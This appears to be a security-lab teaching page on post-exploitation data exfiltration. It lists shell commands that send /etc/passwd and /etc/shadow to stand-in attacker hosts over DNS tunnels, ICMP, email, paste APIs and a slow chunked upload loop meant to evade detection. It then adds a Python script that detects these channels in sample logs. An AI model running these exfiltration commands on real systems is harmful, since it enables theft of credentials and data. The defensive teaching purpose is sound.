>_ Post-Exploitation Lab

PRACIVO LAB — INTENTIONALLY VULNERABLE
⚠️ Pracivo Security Lab — Post-exploitation techniques for authorized penetration testing. Persistence, exfiltration, pivoting, LOLBins, C2 frameworks.

> Data Exfiltration Techniques

EXFILTRATION
# Goal: get data out without triggering DLP or firewall rules

# 1. DNS Tunneling (bypasses most firewalls — outbound DNS is almost always permitted)
# Encode data in DNS queries:
# STOLEN_DATA_BASE64.attacker-dns.com
# Tool: iodine, dnscat2
dnscat2-server attacker.com  # on attacker machine
dnscat2 attacker.com         # on victim

# 2. HTTPS to trusted service (bypasses most DLP)
# Upload to Google Drive, Dropbox, Pastebin via API
curl -X POST "https://api.paste.ee/v1/pastes" -H "X-Auth-Token: API_KEY" -d "@/etc/passwd"

# 3. ICMP tunneling
ping -p $(cat /etc/passwd | xxd -p | head -c 32) attacker.com

# 4. Steganography (hide data in images)
steghide embed -cf photo.jpg -ef secrets.txt -p password
# Upload photo to social media — extract later

# 5. Email (if SMTP is open)
echo "$(cat /etc/shadow)" | mail -s "Report" attacker@gmail.com

# 6. Slow exfiltration (evade anomaly detection)
# Send 1KB/hour instead of 100MB at once
split -b 1024 sensitive_file.txt /tmp/chunk_
for chunk in /tmp/chunk_*; do
  curl -s -F "data=@$chunk" https://attacker.com/upload
  sleep 3600  # 1 hour between chunks
done

# 7. HTTP POST to look like legitimate traffic
# Encode in base64, POST to legitimate-looking URL
curl -X POST https://attacker.com/api/telemetry \
  -H "User-Agent: Mozilla/5.0 (Windows NT 10.0)" \
  -d "telemetry=$(cat /etc/passwd | base64)"

# DETECTION:
# Look for: unusual DNS query lengths, frequent DNS queries to new domains
# Large HTTPS uploads to unexpected destinations
# Anomalous data volume at unusual hours
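The detection notes above can be turned into concrete log analytics. The script below is an added example for this page, not part of the lab's own material: it runs the three heuristics (encoded-looking DNS labels and queries to domains outside a known set, large HTTPS uploads, and small uploads on a fixed timer at unusual hours) over constructed resolver and proxy log lines. The log formats, the `KNOWN_DOMAINS` allow-list and all thresholds are assumptions chosen for the example, not values from the page or from any specific product.

```python
"""Detection heuristics for the DNS-tunneling and HTTP-upload channels above.
Added example; log formats below are constructed (one space-separated record per line)."""
import math
from collections import Counter, defaultdict
from datetime import datetime

# Constructed resolver log: "<ISO timestamp> <client_ip> <qname>"
DNS_LOG = """\
2024-03-01T02:11:03 10.0.0.5 www.example.com
2024-03-01T02:11:04 10.0.0.5 mail.example.com
2024-03-01T02:11:05 10.0.0.7 cm9vdDp4OjA6MDpyb290Oi9yb290Oi9iaW4vYmFzaAo.attacker-dns.com
2024-03-01T02:11:05 10.0.0.7 ZGFlbW9uOng6MToxOmRhZW1vbjovdXNyL3NiaW46L3Vzcg.attacker-dns.com
2024-03-01T02:11:06 10.0.0.7 YmluOng6MjoyOmJpbjovYmluOi91c3Ivc2Jpbi9ub2xvZ2lu.attacker-dns.com
2024-03-01T02:11:07 10.0.0.7 c3luYzp4OjQ6NjU1MzQ6c3luYzovYmluOi9iaW4vc3luYw.attacker-dns.com
2024-03-01T02:11:08 10.0.0.5 cdn.example.com
"""

# Constructed proxy log: "<ISO timestamp> <client_ip> <method> <host> <request_bytes>"
PROXY_LOG = """\
2024-03-01T09:15:00 10.0.0.5 GET www.example.com 512
2024-03-01T09:16:30 10.0.0.5 POST www.example.com 2048
2024-03-01T01:00:02 10.0.0.7 POST attacker.com 1024
2024-03-01T02:00:01 10.0.0.7 POST attacker.com 1024
2024-03-01T03:00:03 10.0.0.7 POST attacker.com 1024
2024-03-01T04:00:02 10.0.0.7 POST attacker.com 1024
2024-03-01T10:02:00 10.0.0.9 POST files.example.net 734003200
"""

# Assumed allow-list of domains the organisation is known to query.
KNOWN_DOMAINS = {"example.com", "example.net"}


def shannon_entropy(s):
    """Bits per character; encoded payloads score far above hostnames like 'mail'."""
    if not s:
        return 0.0
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def base_domain(qname):
    """Registered domain approximated as the last two labels (no public-suffix list)."""
    return ".".join(qname.rstrip(".").split(".")[-2:])


def analyze_dns(log, known=KNOWN_DOMAINS, max_label=30, min_entropy=3.5, min_hits=3):
    """Report base domains with >= min_hits leftmost labels that look like encoded data
    (unusually long or high-entropy), plus whether the domain is outside the known set."""
    hits = defaultdict(int)
    subdomains = defaultdict(set)
    for line in log.splitlines():
        if not line.strip():
            continue
        _ts, _client, qname = line.split()
        dom = base_domain(qname)
        label = qname.split(".")[0]
        subdomains[dom].add(label)
        if len(label) > max_label or shannon_entropy(label) > min_entropy:
            hits[dom] += 1
    return {dom: {"suspicious_queries": n,
                  "distinct_subdomains": len(subdomains[dom]),
                  "new_domain": dom not in known}
            for dom, n in hits.items() if n >= min_hits}


def analyze_uploads(log, large_bytes=50 * 1024 * 1024, business_hours=(8, 18),
                    min_posts=4, jitter=0.05):
    """Report hosts receiving POSTs that are very large ('large_upload'), happen outside
    business hours ('off_hours'), or arrive on a near-constant timer ('regular_cadence'),
    the pattern left by chunked exfiltration with a fixed sleep between uploads."""
    posts = defaultdict(list)  # (client, host) -> [(datetime, bytes)]
    for line in log.splitlines():
        if not line.strip():
            continue
        ts, client, method, host, size = line.split()
        if method == "POST":
            posts[(client, host)].append((datetime.fromisoformat(ts), int(size)))

    findings = defaultdict(set)
    for (_client, host), events in posts.items():
        events.sort()
        if any(size >= large_bytes for _, size in events):
            findings[host].add("large_upload")
        if any(not business_hours[0] <= t.hour < business_hours[1] for t, _ in events):
            findings[host].add("off_hours")
        if len(events) >= min_posts:
            gaps = [(b[0] - a[0]).total_seconds() for a, b in zip(events, events[1:])]
            mean = sum(gaps) / len(gaps)
            if mean > 0 and (max(gaps) - min(gaps)) <= jitter * mean:
                findings[host].add("regular_cadence")
    return {host: sorted(reasons) for host, reasons in findings.items()}


if __name__ == "__main__":
    for dom, info in analyze_dns(DNS_LOG).items():
        print(f"DNS  {dom}: {info}")
    for host, reasons in analyze_uploads(PROXY_LOG).items():
        print(f"HTTP {host}: {', '.join(reasons)}")
```

On the constructed input, `attacker-dns.com` is reported with four encoded-looking labels and no allow-list entry, while `example.com` stays quiet; on the proxy side `attacker.com` trips both `off_hours` and `regular_cadence` (1 KB every hour, as in technique 6) and `files.example.net` trips `large_upload`. In production the thresholds need tuning against a baseline, and the cadence check should be paired with size statistics so that legitimate polling clients are not reported.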